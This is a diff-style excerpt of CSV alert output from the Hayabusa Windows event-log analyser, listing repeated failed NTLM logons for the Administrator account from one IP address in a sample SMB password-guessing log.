+2016-09-20 01:50:46.341 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YxHpSQwFSV4hveVM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: n3OwzSPomxZLoCe6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: e9IfwDZIfYT6A50K  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.463 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JOf6DbRX4zlNqLdb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 00kXrnJNH40NyoYL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nsNHcb9pnpdRgeL7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ucMhgxMXy9Ch1jNm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Cfi3ZaLTECJgjM9x  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: usugjEEBHlhJvOyu  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WQ1pM2CVLt5ITVD5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.746 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NIboW7hNljF3HPpk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rOk5W4rkSYRRw4xS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.858 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AJTfcwd8rnFc06iF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.930 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6sm415W5zkvjdnTV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:46.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KEiSbtlmW4ou1mc7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xWeZV5pHt94adwUy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5np7HeCPAFTDdTXJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gXbe2jEJVtwaQXlr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.134 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7hZFiUCJnaBdHcw4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.176 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: a71wyo41KV1ZoT7p  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ogB17WdeOiC19rqn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.286 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ANOLPWG12lkW39Ei  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.332 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Y1vf7OUxb6TH3Q4H  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bxU5yumSieUzSgzH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: v9K5EoWWASU8SlSe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.445 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PwZLRPFxaFWwjZEe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.500 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8fXgFFb3HTMunsoi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: R1RozAr1uhux4cYW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.586 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: n7EmuUSv03RnhKsF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jw410HEW8EC3MC9f  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UTYp8cEbt3Yggo3J  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.727 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yWJVzgYLWIo7SGCZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DP13jPdW5Gdl8z56  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LNXOWjHmMDhfFVon  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kka1RiF3f7Nhkf8x  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.959 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2o90lG6attzWU4ZN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:47.998 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PyPK9kuJdflQ4RKe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.028 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: a9I3El7d7anR0kIz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eDUMTEfNhFuuqMle  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: e0F70d1WstkqnQgA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Bm0txApQSp1U42N3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JeEe5ENSIZnfc3FG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oasE54Z1FlpswY0d  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Bhje1BgvxOlG28JM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.321 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: L9iTIv4UQ4En9RA2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.356 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Mg8KFm1lCeImj8Sb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: h17Fz1s6GJki61jg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.440 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6Pjjn4FAkJn4h32r  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.483 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ARVx3FAAww8Gmfvc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.533 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sYIwPg5k1wpvWobN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.572 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0sfhYQ54SjC4JTX7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nfZYnUPV40FShcqt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XYbvWVCT0tFixZTH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XC6Vmz0ql8myDuGa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PJ8JvuvZZzwSOzFo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: s06yKaogI6FYkXla  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pCjOc7PguxwNKoQR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BX5IosnpdYZK5xZj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.905 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gfMjB1epEm64wVEX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:48.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pb4FVO2SKsoMyt1K  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.003 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1qoRw2jjFx4F6Wx6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ImiLeiteLoSw32I0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KcIYD47BIEP8gB0L  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lUAeB15aWamcaZ8L  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KFOKiSDWc1dWjzge  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.211 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hqyMtzjKSJEtEAdx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.251 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WtHsItpyFHQxvLWm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.287 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RdGMqIhUGHj23Xm2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BfE5LVmrPaAFLwBR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: b1swKSla5gkdOwxH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.408 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kL9MdVnRVogiP7hF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:49.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aQ0hRdwZvC5PBcXl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
